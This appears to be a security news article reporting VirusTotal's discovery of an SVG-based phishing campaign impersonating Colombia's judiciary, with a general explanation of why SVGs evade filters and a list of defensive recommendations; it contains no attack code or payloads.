SVG-based phishing campaign impersonates Colombian judiciary to deliver malware

The campaign: what VirusTotal uncovered

Security researchers at VirusTotal have identified a phishing campaign that hides malicious content inside Scalable Vector Graphics (SVG) files. The SVGs are designed to render convincing portal pages that impersonate Colombia’s judicial system, and they act as delivery mechanisms for malware.

VirusTotal’s analysis shows attackers embedding active content in SVG files to present realistic-looking portals that prompt victims to interact and ultimately download or execute malicious payloads.

The campaign highlights a growing preference among attackers for non-traditional attachment and hosting formats that can evade simple signature- and extension-based defenses. By using SVGs, the threat actors can present a page-like experience within an image file and use that surface to phish credentials or initiate secondary stages that deploy malware.

Why SVG files matter as an attack vector

SVG is an XML-based vector image format that supports features not available in raster formats such as PNG or JPEG. Because SVGs are text/XML, they can contain embedded links, CSS and — in some contexts — script-like behavior or references to external resources. That flexibility makes SVG useful for legitimate web design but also attractive to attackers.

• Allowed by many gateways: Email and web gateways frequently allow image formats while blocking executable formats, so attackers use image types to bypass coarse filtering.
• Renderable as a page: When rendered in a browser or certain viewers, an SVG can display styled content that resembles a web form or portal page, increasing the credibility of a phishing lure.
• Obfuscatable content: Because SVGs are text-based, attackers can obfuscate HTML-like content, embed data URIs, or encode payload stagers inside the file to complicate static analysis.

These characteristics make SVGs a convenient carrier for social-engineering lures and for initiating follow-on steps that fetch or execute malware — a pattern VirusTotal observed in the campaign targeting Colombia’s judicial system.

Operational analysis and detection challenges (expert perspective)

For defenders, SVG-based campaigns present a mix of detection and response challenges. The following analysis highlights practical technical factors and inspection strategies that practitioners should consider.

• Extension vs. content: Gateways that rely solely on file extensions or MIME types can be bypassed. An attacker can rename files or set benign MIME types while the payload contains XML with active elements.
• Static-analysis blind spots: Traditional AV engines that focus on PE/ELF signatures miss malicious behavior embedded in XML. Attackers can also use base64-encoded blobs or compressed data inside SVGs to conceal payloads.
• Rendering-dependent behavior: Whether an SVG executes active content depends on the renderer (browser, viewer, email client). A file benign when displayed as an inline image in an email client may become active if opened in a browser or an external viewer.
• Hosting and delivery: Attackers frequently host malicious SVGs on legitimate-looking infrastructure or cloud storage to reduce suspicion. They may also distribute SVGs as attachments, links to hosted files, or embedded resources on compromised sites.

Detection and mitigation should therefore combine content inspection, sandbox execution, and runtime telemetry rather than relying solely on signature matching.

Comparable incidents and industry context

The use of non-traditional file formats and hosting mechanisms to deliver phishing lures or malware is consistent with broader trends observed across the threat landscape.

• Phishing remains one of the primary initial access vectors in many breach reports and industry studies, which frequently note attackers’ continual adaptation to bypass defensive controls.
• Attackers have previously weaponized other file formats — such as HTML attachments, ISO files, LNK shortcuts, and even Microsoft Office documents with embedded web content — to present interactive lures while avoiding detection.
• Security communities and vendors have repeatedly warned that XML-based formats (including SVG and certain Office XML packages) can carry active or obfuscated content and should be treated with increased scrutiny.

VirusTotal’s discovery fits into this pattern: adversaries iteratively move to formats that blend legitimate use with the ability to host interactive, obfuscated, or scriptable content.

Actionable recommendations for defenders

Organizations should treat the rise of SVG-based phishing as a prompt to harden attachment handling, enhance inspection pipelines, and refine incident response procedures. Practical steps include:

• Harden mail gateways and file policies
  • Block or quarantine SVG attachments by default where business needs don’t require them.
  • Enforce strict MIME-type validation and drop mismatched files (e.g., a .svg extension with an executable MIME type).
  • Strip or sanitize active content in inbound files: remove scripts, external references, and data URIs where possible.
• Improve content inspection and sandboxing
  • Apply static parsing to detect XML elements commonly abused for interactivity (e.g.,
  • Feed suspicious SVGs into a dynamic sandbox that can render the file and observe network activity, attempted downloads, or suspicious DOM manipulations.
• Harden endpoints and browsers
  • Ensure browsers and image viewers are patched and apply content security policies (CSP) where possible to limit inline execution and resource loading.
  • Configure EDR/endpoint controls to monitor processes spawned by unexpected renderers or to block the download of executables initiated by document or image renderers.
• Hunt and alert
  • Create detection rules and YARA signatures that flag SVGs containing script tags, inline event handlers, data URI payloads, or unusually long base64 sections.
  • Hunt for network indicators such as connections to newly registered domains, cloud storage links delivering SVG files, or anomalous GET requests for .svg resources.
• User training and operational controls
  • Educate users to treat unexpected attachments — even images — with suspicion, especially those purporting to be official portals or requesting credentials and downloads.
  • Implement technical controls for high-risk communications channels (e.g., require secure portals for official notices rather than email attachments.)

Conclusion

VirusTotal’s findings underscore a simple but persistent reality: attackers will exploit any format that can plausibly bypass filters and convince a user to act. SVG files, because they are text-based and capable of displaying page-like content, are increasingly attractive for phishing campaigns that aim to deliver malware. Defenders should treat SVGs as potentially active content, augment inspection and sandboxing capabilities, and tighten attachment policies and user-facing procedures to reduce the risk of compromise.

Source: www.bleepingcomputer.com